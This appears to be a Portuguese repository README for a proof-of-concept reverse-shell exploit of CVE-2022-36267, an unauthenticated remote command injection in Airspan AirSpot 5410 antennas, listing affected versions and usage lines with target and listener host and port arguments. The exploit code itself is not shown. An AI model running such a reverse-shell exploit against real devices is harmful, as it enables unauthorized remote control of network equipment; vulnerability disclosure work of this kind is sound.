
Script PoC para CVE-2022-36267: Explora uma vulnerabilidade de injeção remota de comandos não autenticada na antena Airspan AirSpot 5410.
Este repositório contém um script de shell reverso de Prova de Conceito (PoC) para explorar o CVE-2022-36267, uma vulnerabilidade crítica em dispositivos Airspan AirSpot 5410. O script é uma demonstração prática, complementando a análise aprofundada fornecida no post do blog "Airspan AirSpot 5410 - Relatório de Vulnerabilidade."
Todos os dispositivos Airspan AirSpot 5410 da versão 0.3.4.1-4 e anteriores.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

APENAS PARA FINS EDUCACIONAIS.